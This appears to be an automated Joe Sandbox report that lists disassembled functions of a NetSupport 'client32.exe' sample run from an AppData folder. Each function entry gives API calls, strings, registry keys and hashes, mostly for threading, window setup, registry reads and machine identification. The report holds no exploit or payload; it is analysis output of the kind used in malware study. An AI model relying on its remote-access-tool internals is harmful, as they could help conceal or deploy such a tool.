API ID: AddressProc$ErrorFileImageLastNameProcess
String ID: GetModuleFileNameExA$GetProcessImageFileNameA
API String ID: 4186647306-532032230
Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0

Function 11110040 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7774C3F0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
CloseHandle.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1

Strings

..\ctl32\Refcount.cpp, xrefs: 1111008B
hThread, xrefs: 11110090

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: ..\ctl32\Refcount.cpp$hThread
API String ID: 3360349984-1136101629
Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0

Function 11032020 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11032067

Strings

_HF, xrefs: 11032048, 1103204D
124406, xrefs: 1103204E
%s%s%s.bin, xrefs: 11032061
_HW, xrefs: 11032030
_SW, xrefs: 1103203C

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s%s%s.bin$124406$_HF$_HW$_SW
API String ID: 2111968516-2587288932
Opcode ID: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
Instruction ID: fa910be19caf0a14a4f119543ead50e584fafd0cecff00e00c2366bf95bcdf21
Opcode Fuzzy Hash: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
Instruction Fuzzy Hash: 2AE092A4E5460C9BF300A6498C11BAAFACC174475BFC4C051BFF9AB6A3E9299904C6D2

Function 11103630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
GetStockObject.GDI32(00000004), ref: 111036DB
RegisterClassA.USER32(?), ref: 111036EF
CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 1110372C

Strings

NSMDesktopWnd, xrefs: 11103669, 111036E8, 11103726

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomClassCreateGlobalObjectRegisterStockWindow
String ID: NSMDesktopWnd
API String ID: 2669163067-206650970
Opcode ID: f412c802fa78ea5983901fd5e9bd27c26c396090c77b4c7bd5d98287236fca51
Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
Opcode Fuzzy Hash: f412c802fa78ea5983901fd5e9bd27c26c396090c77b4c7bd5d98287236fca51
Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94

Function 11145F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
RegCloseKey.ADVAPI32(?), ref: 11145FD4

Strings

ForceRTL, xrefs: 11145F93
SOFTWARE\Productive Computer Insight\PCICTL, xrefs: 11145F37, 11145F6E
SOFTWARE\NetSupport Ltd\PCICTL, xrefs: 11145F50

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
API String ID: 47109696-3245241687
Opcode ID: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
Opcode Fuzzy Hash: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3

Function 111121E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
Part of subcall function 11112140: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9

GetComputerNameA.KERNEL32(?,?), ref: 11112288

Strings

\Registry\Machine\SOFTWARE\Classes\N%x.%s, xrefs: 11112297
, xrefs: 11112281
\Registry\Machine\SOFTWARE\Classes\N%x, xrefs: 11112230
ACM, xrefs: 11112242

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
API String ID: 806825551-1858614750
Opcode ID: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
Instruction ID: ca260b95ce0435fc80d5678de4b29a4f2f4f697687454b99fdfeb2ddb07782e0
Opcode Fuzzy Hash: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
Instruction Fuzzy Hash: C62149B6A042855AD701CE70DD80BFFFFAADB8A204F1445B8D851CB545E736D604C390

Function 11144DD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe,00000104,?,11144A43,?), ref: 11144819

WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E25
ResetEvent.KERNEL32(000002A0), ref: 11144E39
SetEvent.KERNEL32(000002A0), ref: 11144E4F
WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E5E

Strings

MiniDump, xrefs: 11144DD7

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
String ID: MiniDump
API String ID: 1494854734-2840755058
Opcode ID: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
Instruction ID: ea994b22643fb5a56552c53957c3f10a02c9a0f0123a866c2d557df6367c4d32
Opcode Fuzzy Hash: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
Instruction Fuzzy Hash: 1F112975A8412577E710DBA8DC81F9BF768AB04B28F200230E634E7AC4EB74A50587A1

Function 111479B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 111479DF
wsprintfA.USER32 ref: 11147A16

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

i < _tsizeof (buf), xrefs: 11147A30
#%d, xrefs: 11147A10
..\ctl32\util.cpp, xrefs: 11147A2B

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastLoadMessageProcessString
String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
API String ID: 1985783259-2296142801
Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4

Function 111101B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 111101C9

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

wsprintfA.USER32 ref: 111101E4

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

_memset.LIBCMT ref: 11110207

Strings

Can't alloc %u bytes, xrefs: 111101DE
..\ctl32\Refcount.cpp, xrefs: 111101F5

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
API String ID: 3234921582-2664294811
Opcode ID: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
Opcode Fuzzy Hash: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5

Function 111466B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75A38400), ref: 11145CA0
Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA

LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4

Strings

shcore.dll, xrefs: 111466CA
SetProcessDpiAwareness, xrefs: 111466DB

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
String ID: SetProcessDpiAwareness$shcore.dll
API String ID: 1108920153-1959555903
Opcode ID: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
Instruction ID: b4913e853cd1401fb26aad2e9137c069c6cdc321efb83b495f2c8eb55c4c44ed
Opcode Fuzzy Hash: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
Instruction Fuzzy Hash: CDF0A03A781225A3E51912AABD58B9ABB5C9BC1A7EF150230F929D6DC0DB50C50082B5

Function 11031F30 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11031FE6

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

124406, xrefs: 11031FC7
%s%s.bin, xrefs: 11031FE0
clientinv.cpp, xrefs: 11031F5E
m_pDoInv == NULL, xrefs: 11031F63

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastMessageProcess
String ID: %s%s.bin$124406$clientinv.cpp$m_pDoInv == NULL
API String ID: 4180936305-130860707
Opcode ID: bd07d82e204d55fca40885ac61f8c39d8728cbd3a2f7a07743be8c59493d1746
Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
Opcode Fuzzy Hash: bd07d82e204d55fca40885ac61f8c39d8728cbd3a2f7a07743be8c59493d1746
Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51

Function 11145240 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
__strdup.LIBCMT ref: 11145277

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

Part of subcall function 11145240: _free.LIBCMT ref: 1114529E

_free.LIBCMT ref: 111452AC

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

